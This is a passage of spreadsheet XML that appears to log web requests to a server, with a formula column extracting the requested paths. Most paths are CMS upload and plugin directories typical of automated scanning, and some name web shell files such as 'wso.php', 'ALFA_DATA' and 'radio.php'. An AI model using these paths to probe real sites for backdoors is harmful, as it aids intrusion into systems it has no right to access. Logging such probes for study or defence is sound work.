      <c r="A2912" s="1">
        <v>45277.846203703702</v>
      </c>
      <c r="B2912" t="s">
        <v>1243</v>
      </c>
      <c r="C2912" t="s">
        <v>1244</v>
      </c>
      <c r="D2912" t="str">
        <f t="shared" si="45"/>
        <v/>
      </c>
      <c r="E2912" t="s">
        <v>1245</v>
      </c>
    </row>
    <row r="2913" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A2913" s="1">
        <v>45277.846192129633</v>
      </c>
      <c r="B2913" t="s">
        <v>1243</v>
      </c>
      <c r="C2913" t="s">
        <v>1244</v>
      </c>
      <c r="D2913" t="str">
        <f t="shared" si="45"/>
        <v/>
      </c>
      <c r="E2913" t="s">
        <v>1246</v>
      </c>
    </row>
    <row r="2914" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A2914" s="1">
        <v>45277.279618055552</v>
      </c>
      <c r="B2914" t="s">
        <v>1232</v>
      </c>
      <c r="C2914" t="s">
        <v>5</v>
      </c>
      <c r="D2914" t="str">
        <f t="shared" si="45"/>
        <v/>
      </c>
      <c r="E2914" t="s">
        <v>69</v>
      </c>
    </row>
    <row r="2915" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A2915" s="1">
        <v>45276.657962962963</v>
      </c>
      <c r="B2915" t="s">
        <v>1247</v>
      </c>
      <c r="C2915" t="s">
        <v>421</v>
      </c>
      <c r="D2915" t="str">
        <f t="shared" si="45"/>
        <v>wp-admin/meta/</v>
      </c>
      <c r="E2915" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="2916" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A2916" s="1">
        <v>45276.656284722223</v>
      </c>
      <c r="B2916" t="s">
        <v>1247</v>
      </c>
      <c r="C2916" t="s">
        <v>420</v>
      </c>
      <c r="D2916" t="str">
        <f t="shared" si="45"/>
        <v>admin/uploads/images/</v>
      </c>
      <c r="E2916" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="2917" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A2917" s="1">
        <v>45276.656145833331</v>
      </c>
      <c r="B2917" t="s">
        <v>1247</v>
      </c>
      <c r="C2917" t="s">
        <v>427</v>
      </c>
      <c r="D2917" t="str">
        <f t="shared" si="45"/>
        <v>components/</v>
      </c>
      <c r="E2917" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="2918" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A2918" s="1">
        <v>45276.65587962963</v>
      </c>
      <c r="B2918" t="s">
        <v>1247</v>
      </c>
      <c r="C2918" t="s">
        <v>426</v>
      </c>
      <c r="D2918" t="str">
        <f t="shared" si="45"/>
        <v>modules/mod_simplefileuploadv1.3/elements/</v>
      </c>
      <c r="E2918" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="2919" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A2919" s="1">
        <v>45276.655694444446</v>
      </c>
      <c r="B2919" t="s">
        <v>1247</v>
      </c>
      <c r="C2919" t="s">
        <v>425</v>
      </c>
      <c r="D2919" t="str">
        <f t="shared" si="45"/>
        <v>admin/controller/extension/extension/</v>
      </c>
      <c r="E2919" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="2920" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A2920" s="1">
        <v>45276.655509259261</v>
      </c>
      <c r="B2920" t="s">
        <v>1247</v>
      </c>
      <c r="C2920" t="s">
        <v>424</v>
      </c>
      <c r="D2920" t="str">
        <f t="shared" si="45"/>
        <v>sites/default/files/</v>
      </c>
      <c r="E2920" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="2921" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A2921" s="1">
        <v>45276.655381944445</v>
      </c>
      <c r="B2921" t="s">
        <v>1247</v>
      </c>
      <c r="C2921" t="s">
        <v>423</v>
      </c>
      <c r="D2921" t="str">
        <f t="shared" si="45"/>
        <v>admin/fckeditor/editor/filemanager/</v>
      </c>
      <c r="E2921" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="2922" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A2922" s="1">
        <v>45276.655057870368</v>
      </c>
      <c r="B2922" t="s">
        <v>1247</v>
      </c>
      <c r="C2922" t="s">
        <v>422</v>
      </c>
      <c r="D2922" t="str">
        <f t="shared" si="45"/>
        <v>admin/images/slider/</v>
      </c>
      <c r="E2922" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="2923" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A2923" s="1">
        <v>45276.653113425928</v>
      </c>
      <c r="B2923" t="s">
        <v>1247</v>
      </c>
      <c r="C2923" t="s">
        <v>428</v>
      </c>
      <c r="D2923" t="str">
        <f t="shared" si="45"/>
        <v>wp-includes/random_compat/</v>
      </c>
      <c r="E2923" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="2924" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A2924" s="1">
        <v>45276.650983796295</v>
      </c>
      <c r="B2924" t="s">
        <v>1247</v>
      </c>
      <c r="C2924" t="s">
        <v>430</v>
      </c>
      <c r="D2924" t="str">
        <f t="shared" si="45"/>
        <v>wp-includes/Text/Diff/Engine/Engine/</v>
      </c>
      <c r="E2924" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="2925" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A2925" s="1">
        <v>45276.65047453704</v>
      </c>
      <c r="B2925" t="s">
        <v>1247</v>
      </c>
      <c r="C2925" t="s">
        <v>429</v>
      </c>
      <c r="D2925" t="str">
        <f t="shared" si="45"/>
        <v>wp-includes/Requests/Auth/</v>
      </c>
      <c r="E2925" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="2926" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A2926" s="1">
        <v>45276.650335648148</v>
      </c>
      <c r="B2926" t="s">
        <v>1247</v>
      </c>
      <c r="C2926" t="s">
        <v>432</v>
      </c>
      <c r="D2926" t="str">
        <f t="shared" si="45"/>
        <v>wp-includes/Requests/Exception/</v>
      </c>
      <c r="E2926" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="2927" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A2927" s="1">
        <v>45276.650034722225</v>
      </c>
      <c r="B2927" t="s">
        <v>1247</v>
      </c>
      <c r="C2927" t="s">
        <v>431</v>
      </c>
      <c r="D2927" t="str">
        <f t="shared" si="45"/>
        <v>wp-includes/images/wlw/</v>
      </c>
      <c r="E2927" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="2928" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A2928" s="1">
        <v>45276.649097222224</v>
      </c>
      <c r="B2928" t="s">
        <v>1247</v>
      </c>
      <c r="C2928" t="s">
        <v>433</v>
      </c>
      <c r="D2928" t="str">
        <f t="shared" si="45"/>
        <v>wp-includes/Requests/Exception/HTTP/</v>
      </c>
      <c r="E2928" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="2929" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A2929" s="1">
        <v>45276.648622685185</v>
      </c>
      <c r="B2929" t="s">
        <v>1247</v>
      </c>
      <c r="C2929" t="s">
        <v>434</v>
      </c>
      <c r="D2929" t="str">
        <f t="shared" si="45"/>
        <v>wp-includes/Requests/Utility/</v>
      </c>
      <c r="E2929" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="2930" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A2930" s="1">
        <v>45276.648472222223</v>
      </c>
      <c r="B2930" t="s">
        <v>1247</v>
      </c>
      <c r="C2930" t="s">
        <v>436</v>
      </c>
      <c r="D2930" t="str">
        <f t="shared" si="45"/>
        <v>wp-includes/Requests/Transport/</v>
      </c>
      <c r="E2930" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="2931" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A2931" s="1">
        <v>45276.648240740738</v>
      </c>
      <c r="B2931" t="s">
        <v>1247</v>
      </c>
      <c r="C2931" t="s">
        <v>435</v>
      </c>
      <c r="D2931" t="str">
        <f t="shared" si="45"/>
        <v>wp-includes/Requests/Response/</v>
      </c>
      <c r="E2931" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="2932" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A2932" s="1">
        <v>45276.648043981484</v>
      </c>
      <c r="B2932" t="s">
        <v>1247</v>
      </c>
      <c r="C2932" t="s">
        <v>437</v>
      </c>
      <c r="D2932" t="str">
        <f t="shared" si="45"/>
        <v>wp-includes/Requests/Proxy/</v>
      </c>
      <c r="E2932" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="2933" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A2933" s="1">
        <v>45276.647997685184</v>
      </c>
      <c r="B2933" t="s">
        <v>1247</v>
      </c>
      <c r="C2933" t="s">
        <v>438</v>
      </c>
      <c r="D2933" t="str">
        <f t="shared" si="45"/>
        <v>wp-includes/Requests/Cookie/</v>
      </c>
      <c r="E2933" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="2934" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A2934" s="1">
        <v>45276.644814814812</v>
      </c>
      <c r="B2934" t="s">
        <v>1247</v>
      </c>
      <c r="C2934" t="s">
        <v>439</v>
      </c>
      <c r="D2934" t="str">
        <f t="shared" si="45"/>
        <v>php/</v>
      </c>
      <c r="E2934" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="2935" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A2935" s="1">
        <v>45276.644618055558</v>
      </c>
      <c r="B2935" t="s">
        <v>1247</v>
      </c>
      <c r="C2935" t="s">
        <v>442</v>
      </c>
      <c r="D2935" t="str">
        <f t="shared" si="45"/>
        <v>plugins/</v>
      </c>
      <c r="E2935" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="2936" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A2936" s="1">
        <v>45276.644363425927</v>
      </c>
      <c r="B2936" t="s">
        <v>1247</v>
      </c>
      <c r="C2936" t="s">
        <v>441</v>
      </c>
      <c r="D2936" t="str">
        <f t="shared" si="45"/>
        <v>images/stories/</v>
      </c>
      <c r="E2936" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="2937" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A2937" s="1">
        <v>45276.64403935185</v>
      </c>
      <c r="B2937" t="s">
        <v>1247</v>
      </c>
      <c r="C2937" t="s">
        <v>448</v>
      </c>
      <c r="D2937" t="str">
        <f t="shared" si="45"/>
        <v>include/</v>
      </c>
      <c r="E2937" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="2938" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A2938" s="1">
        <v>45276.643796296295</v>
      </c>
      <c r="B2938" t="s">
        <v>1247</v>
      </c>
      <c r="C2938" t="s">
        <v>447</v>
      </c>
      <c r="D2938" t="str">
        <f t="shared" si="45"/>
        <v>admin/editor/</v>
      </c>
      <c r="E2938" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="2939" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A2939" s="1">
        <v>45276.643530092595</v>
      </c>
      <c r="B2939" t="s">
        <v>1247</v>
      </c>
      <c r="C2939" t="s">
        <v>446</v>
      </c>
      <c r="D2939" t="str">
        <f t="shared" si="45"/>
        <v>files/</v>
      </c>
      <c r="E2939" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="2940" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A2940" s="1">
        <v>45276.643217592595</v>
      </c>
      <c r="B2940" t="s">
        <v>1247</v>
      </c>
      <c r="C2940" t="s">
        <v>445</v>
      </c>
      <c r="D2940" t="str">
        <f t="shared" si="45"/>
        <v>shop/</v>
      </c>
      <c r="E2940" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="2941" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A2941" s="1">
        <v>45276.64303240741</v>
      </c>
      <c r="B2941" t="s">
        <v>1247</v>
      </c>
      <c r="C2941" t="s">
        <v>444</v>
      </c>
      <c r="D2941" t="str">
        <f t="shared" si="45"/>
        <v>template/</v>
      </c>
      <c r="E2941" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="2942" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A2942" s="1">
        <v>45276.642812500002</v>
      </c>
      <c r="B2942" t="s">
        <v>1247</v>
      </c>
      <c r="C2942" t="s">
        <v>443</v>
      </c>
      <c r="D2942" t="str">
        <f t="shared" si="45"/>
        <v>system/</v>
      </c>
      <c r="E2942" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="2943" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A2943" s="1">
        <v>45276.64261574074</v>
      </c>
      <c r="B2943" t="s">
        <v>1247</v>
      </c>
      <c r="C2943" t="s">
        <v>454</v>
      </c>
      <c r="D2943" t="str">
        <f t="shared" si="45"/>
        <v>Site/</v>
      </c>
      <c r="E2943" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="2944" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A2944" s="1">
        <v>45276.642291666663</v>
      </c>
      <c r="B2944" t="s">
        <v>1247</v>
      </c>
      <c r="C2944" t="s">
        <v>453</v>
      </c>
      <c r="D2944" t="str">
        <f t="shared" si="45"/>
        <v>modules/</v>
      </c>
      <c r="E2944" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="2945" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A2945" s="1">
        <v>45276.642187500001</v>
      </c>
      <c r="B2945" t="s">
        <v>1247</v>
      </c>
      <c r="C2945" t="s">
        <v>452</v>
      </c>
      <c r="D2945" t="str">
        <f t="shared" si="45"/>
        <v>local/</v>
      </c>
      <c r="E2945" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="2946" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A2946" s="1">
        <v>45276.642002314817</v>
      </c>
      <c r="B2946" t="s">
        <v>1247</v>
      </c>
      <c r="C2946" t="s">
        <v>451</v>
      </c>
      <c r="D2946" t="str">
        <f t="shared" ref="D2946:D3009" si="46">MID(C2946,FIND("#", SUBSTITUTE(C2946, "/", "#", 3))+1,LEN(C2946)-FIND("#", SUBSTITUTE(C2946, "/", "#", 3))+1)</f>
        <v>vendor/</v>
      </c>
      <c r="E2946" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="2947" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A2947" s="1">
        <v>45276.641736111109</v>
      </c>
      <c r="B2947" t="s">
        <v>1247</v>
      </c>
      <c r="C2947" t="s">
        <v>450</v>
      </c>
      <c r="D2947" t="str">
        <f t="shared" si="46"/>
        <v>Public/</v>
      </c>
      <c r="E2947" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="2948" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A2948" s="1">
        <v>45276.641539351855</v>
      </c>
      <c r="B2948" t="s">
        <v>1247</v>
      </c>
      <c r="C2948" t="s">
        <v>449</v>
      </c>
      <c r="D2948" t="str">
        <f t="shared" si="46"/>
        <v>assets/images/</v>
      </c>
      <c r="E2948" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="2949" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A2949" s="1">
        <v>45276.64130787037</v>
      </c>
      <c r="B2949" t="s">
        <v>1247</v>
      </c>
      <c r="C2949" t="s">
        <v>458</v>
      </c>
      <c r="D2949" t="str">
        <f t="shared" si="46"/>
        <v>upload/image/</v>
      </c>
      <c r="E2949" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="2950" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A2950" s="1">
        <v>45276.641099537039</v>
      </c>
      <c r="B2950" t="s">
        <v>1247</v>
      </c>
      <c r="C2950" t="s">
        <v>457</v>
      </c>
      <c r="D2950" t="str">
        <f t="shared" si="46"/>
        <v>vendor/phpunit/phpunit/src/Util/PHP/</v>
      </c>
      <c r="E2950" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="2951" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A2951" s="1">
        <v>45276.640833333331</v>
      </c>
      <c r="B2951" t="s">
        <v>1247</v>
      </c>
      <c r="C2951" t="s">
        <v>456</v>
      </c>
      <c r="D2951" t="str">
        <f t="shared" si="46"/>
        <v>assets/</v>
      </c>
      <c r="E2951" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="2952" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A2952" s="1">
        <v>45276.640543981484</v>
      </c>
      <c r="B2952" t="s">
        <v>1247</v>
      </c>
      <c r="C2952" t="s">
        <v>455</v>
      </c>
      <c r="D2952" t="str">
        <f t="shared" si="46"/>
        <v>images/</v>
      </c>
      <c r="E2952" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="2953" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A2953" s="1">
        <v>45276.64025462963</v>
      </c>
      <c r="B2953" t="s">
        <v>1247</v>
      </c>
      <c r="C2953" t="s">
        <v>464</v>
      </c>
      <c r="D2953" t="str">
        <f t="shared" si="46"/>
        <v>Admin/uploads/</v>
      </c>
      <c r="E2953" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="2954" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A2954" s="1">
        <v>45276.639803240738</v>
      </c>
      <c r="B2954" t="s">
        <v>1247</v>
      </c>
      <c r="C2954" t="s">
        <v>463</v>
      </c>
      <c r="D2954" t="str">
        <f t="shared" si="46"/>
        <v>admin/uploads/</v>
      </c>
      <c r="E2954" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="2955" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A2955" s="1">
        <v>45276.639594907407</v>
      </c>
      <c r="B2955" t="s">
        <v>1247</v>
      </c>
      <c r="C2955" t="s">
        <v>462</v>
      </c>
      <c r="D2955" t="str">
        <f t="shared" si="46"/>
        <v>upload/</v>
      </c>
      <c r="E2955" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="2956" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A2956" s="1">
        <v>45276.639386574076</v>
      </c>
      <c r="B2956" t="s">
        <v>1247</v>
      </c>
      <c r="C2956" t="s">
        <v>461</v>
      </c>
      <c r="D2956" t="str">
        <f t="shared" si="46"/>
        <v>uploads/</v>
      </c>
      <c r="E2956" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="2957" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A2957" s="1">
        <v>45276.638761574075</v>
      </c>
      <c r="B2957" t="s">
        <v>1247</v>
      </c>
      <c r="C2957" t="s">
        <v>460</v>
      </c>
      <c r="D2957" t="str">
        <f t="shared" si="46"/>
        <v>.well-knownold/</v>
      </c>
      <c r="E2957" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="2958" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A2958" s="1">
        <v>45276.63858796296</v>
      </c>
      <c r="B2958" t="s">
        <v>1247</v>
      </c>
      <c r="C2958" t="s">
        <v>459</v>
      </c>
      <c r="D2958" t="str">
        <f t="shared" si="46"/>
        <v>ALFA_DATA/</v>
      </c>
      <c r="E2958" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="2959" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A2959" s="1">
        <v>45276.637650462966</v>
      </c>
      <c r="B2959" t="s">
        <v>1247</v>
      </c>
      <c r="C2959" t="s">
        <v>460</v>
      </c>
      <c r="D2959" t="str">
        <f t="shared" si="46"/>
        <v>.well-knownold/</v>
      </c>
      <c r="E2959" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="2960" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A2960" s="1">
        <v>45276.637395833335</v>
      </c>
      <c r="B2960" t="s">
        <v>1247</v>
      </c>
      <c r="C2960" t="s">
        <v>459</v>
      </c>
      <c r="D2960" t="str">
        <f t="shared" si="46"/>
        <v>ALFA_DATA/</v>
      </c>
      <c r="E2960" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="2961" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A2961" s="1">
        <v>45276.635578703703</v>
      </c>
      <c r="B2961" t="s">
        <v>1247</v>
      </c>
      <c r="C2961" t="s">
        <v>466</v>
      </c>
      <c r="D2961" t="str">
        <f t="shared" si="46"/>
        <v>wp-content/plugins/ninja-forms/</v>
      </c>
      <c r="E2961" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="2962" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A2962" s="1">
        <v>45276.635416666664</v>
      </c>
      <c r="B2962" t="s">
        <v>1247</v>
      </c>
      <c r="C2962" t="s">
        <v>465</v>
      </c>
      <c r="D2962" t="str">
        <f t="shared" si="46"/>
        <v>wp-content/themes/classic/inc/</v>
      </c>
      <c r="E2962" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="2963" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A2963" s="1">
        <v>45276.63517361111</v>
      </c>
      <c r="B2963" t="s">
        <v>1247</v>
      </c>
      <c r="C2963" t="s">
        <v>467</v>
      </c>
      <c r="D2963" t="str">
        <f t="shared" si="46"/>
        <v>wp-content/mu-plugins-old/</v>
      </c>
      <c r="E2963" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="2964" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A2964" s="1">
        <v>45276.610069444447</v>
      </c>
      <c r="B2964" t="s">
        <v>1248</v>
      </c>
      <c r="C2964" t="s">
        <v>1249</v>
      </c>
      <c r="D2964" t="str">
        <f t="shared" si="46"/>
        <v>style.php?sig=update&amp;domain=51.79.124.111</v>
      </c>
      <c r="E2964" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="2965" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A2965" s="1">
        <v>45276.298101851855</v>
      </c>
      <c r="B2965" t="s">
        <v>863</v>
      </c>
      <c r="C2965" t="s">
        <v>864</v>
      </c>
      <c r="D2965" t="str">
        <f t="shared" si="46"/>
        <v>sellers.json</v>
      </c>
      <c r="E2965" t="s">
        <v>870</v>
      </c>
    </row>
    <row r="2966" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A2966" s="1">
        <v>45275.94425925926</v>
      </c>
      <c r="B2966" t="s">
        <v>1232</v>
      </c>
      <c r="C2966" t="s">
        <v>5</v>
      </c>
      <c r="D2966" t="str">
        <f t="shared" si="46"/>
        <v/>
      </c>
      <c r="E2966" t="s">
        <v>69</v>
      </c>
    </row>
    <row r="2967" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A2967" s="1">
        <v>45275.273680555554</v>
      </c>
      <c r="B2967" t="s">
        <v>863</v>
      </c>
      <c r="C2967" t="s">
        <v>864</v>
      </c>
      <c r="D2967" t="str">
        <f t="shared" si="46"/>
        <v>sellers.json</v>
      </c>
      <c r="E2967" t="s">
        <v>865</v>
      </c>
    </row>
    <row r="2968" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A2968" s="1">
        <v>45275.162222222221</v>
      </c>
      <c r="B2968" t="s">
        <v>1232</v>
      </c>
      <c r="C2968" t="s">
        <v>5</v>
      </c>
      <c r="D2968" t="str">
        <f t="shared" si="46"/>
        <v/>
      </c>
      <c r="E2968" t="s">
        <v>69</v>
      </c>
    </row>
    <row r="2969" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A2969" s="1">
        <v>45275.161238425928</v>
      </c>
      <c r="B2969" t="s">
        <v>1250</v>
      </c>
      <c r="C2969" t="s">
        <v>5</v>
      </c>
      <c r="D2969" t="str">
        <f t="shared" si="46"/>
        <v/>
      </c>
      <c r="E2969" t="s">
        <v>665</v>
      </c>
    </row>
    <row r="2970" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A2970" s="1">
        <v>45275.156504629631</v>
      </c>
      <c r="B2970" t="s">
        <v>1250</v>
      </c>
      <c r="C2970" t="s">
        <v>5</v>
      </c>
      <c r="D2970" t="str">
        <f t="shared" si="46"/>
        <v/>
      </c>
      <c r="E2970" t="s">
        <v>665</v>
      </c>
    </row>
    <row r="2971" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A2971" s="1">
        <v>45275.15457175926</v>
      </c>
      <c r="B2971" t="s">
        <v>1250</v>
      </c>
      <c r="C2971" t="s">
        <v>5</v>
      </c>
      <c r="D2971" t="str">
        <f t="shared" si="46"/>
        <v/>
      </c>
      <c r="E2971" t="s">
        <v>665</v>
      </c>
    </row>
    <row r="2972" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A2972" s="1">
        <v>45274.374282407407</v>
      </c>
      <c r="B2972" t="s">
        <v>1251</v>
      </c>
      <c r="C2972" t="s">
        <v>5</v>
      </c>
      <c r="D2972" t="str">
        <f t="shared" si="46"/>
        <v/>
      </c>
      <c r="E2972" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="2973" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A2973" s="1">
        <v>45274.036770833336</v>
      </c>
      <c r="B2973" t="s">
        <v>1229</v>
      </c>
      <c r="C2973" t="s">
        <v>5</v>
      </c>
      <c r="D2973" t="str">
        <f t="shared" si="46"/>
        <v/>
      </c>
      <c r="E2973" t="s">
        <v>69</v>
      </c>
    </row>
    <row r="2974" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A2974" s="1">
        <v>45273.394537037035</v>
      </c>
      <c r="B2974" t="s">
        <v>1252</v>
      </c>
      <c r="C2974" t="s">
        <v>959</v>
      </c>
      <c r="D2974" t="str">
        <f t="shared" si="46"/>
        <v>radio.php</v>
      </c>
      <c r="E2974" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="2975" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A2975" s="1">
        <v>45273.39434027778</v>
      </c>
      <c r="B2975" t="s">
        <v>1253</v>
      </c>
      <c r="C2975" t="s">
        <v>5</v>
      </c>
      <c r="D2975" t="str">
        <f t="shared" si="46"/>
        <v/>
      </c>
      <c r="E2975" t="s">
        <v>1254</v>
      </c>
    </row>
    <row r="2976" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A2976" s="1">
        <v>45273.257337962961</v>
      </c>
      <c r="B2976" t="s">
        <v>863</v>
      </c>
      <c r="C2976" t="s">
        <v>864</v>
      </c>
      <c r="D2976" t="str">
        <f t="shared" si="46"/>
        <v>sellers.json</v>
      </c>
      <c r="E2976" t="s">
        <v>870</v>
      </c>
    </row>
    <row r="2977" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A2977" s="1">
        <v>45273.252592592595</v>
      </c>
      <c r="B2977" t="s">
        <v>1255</v>
      </c>
      <c r="C2977" t="s">
        <v>959</v>
      </c>
      <c r="D2977" t="str">
        <f t="shared" si="46"/>
        <v>radio.php</v>
      </c>
      <c r="E2977" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="2978" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A2978" s="1">
        <v>45273.170567129629</v>
      </c>
      <c r="B2978" t="s">
        <v>1256</v>
      </c>
      <c r="C2978" t="s">
        <v>861</v>
      </c>
      <c r="D2978" t="str">
        <f t="shared" si="46"/>
        <v>daily-updates/</v>
      </c>
      <c r="E2978" t="s">
        <v>69</v>
      </c>
    </row>
    <row r="2979" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A2979" s="1">
        <v>45273.170532407406</v>
      </c>
      <c r="B2979" t="s">
        <v>1256</v>
      </c>
      <c r="C2979" t="s">
        <v>861</v>
      </c>
      <c r="D2979" t="str">
        <f t="shared" si="46"/>
        <v>daily-updates/</v>
      </c>
      <c r="E2979" t="s">
        <v>69</v>
      </c>
    </row>
    <row r="2980" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A2980" s="1">
        <v>45273.152615740742</v>
      </c>
      <c r="B2980" t="s">
        <v>1239</v>
      </c>
      <c r="C2980" t="s">
        <v>97</v>
      </c>
      <c r="D2980" t="str">
        <f t="shared" si="46"/>
        <v>viewup.php</v>
      </c>
      <c r="E2980" t="s">
        <v>69</v>
      </c>
    </row>
    <row r="2981" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A2981" s="1">
        <v>45273.152083333334</v>
      </c>
      <c r="B2981" t="s">
        <v>1257</v>
      </c>
      <c r="C2981" t="s">
        <v>1258</v>
      </c>
      <c r="D2981" t="str">
        <f t="shared" si="46"/>
        <v>view.php</v>
      </c>
      <c r="E2981" t="s">
        <v>69</v>
      </c>
    </row>
    <row r="2982" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A2982" s="1">
        <v>45272.75917824074</v>
      </c>
      <c r="B2982" t="s">
        <v>1070</v>
      </c>
      <c r="C2982" t="s">
        <v>959</v>
      </c>
      <c r="D2982" t="str">
        <f t="shared" si="46"/>
        <v>radio.php</v>
      </c>
      <c r="E2982" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="2983" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A2983" s="1">
        <v>45272.708715277775</v>
      </c>
      <c r="B2983" t="s">
        <v>1255</v>
      </c>
      <c r="C2983" t="s">
        <v>1099</v>
      </c>
      <c r="D2983" t="str">
        <f t="shared" si="46"/>
        <v>radio.php</v>
      </c>
      <c r="E2983" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="2984" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A2984" s="1">
        <v>45272.636157407411</v>
      </c>
      <c r="B2984" t="s">
        <v>1075</v>
      </c>
      <c r="C2984" t="s">
        <v>1259</v>
      </c>
      <c r="D2984" t="str">
        <f t="shared" si="46"/>
        <v>wp-content/wso.php</v>
      </c>
      <c r="E2984" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="2985" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A2985" s="1">
        <v>45272.635937500003</v>
      </c>
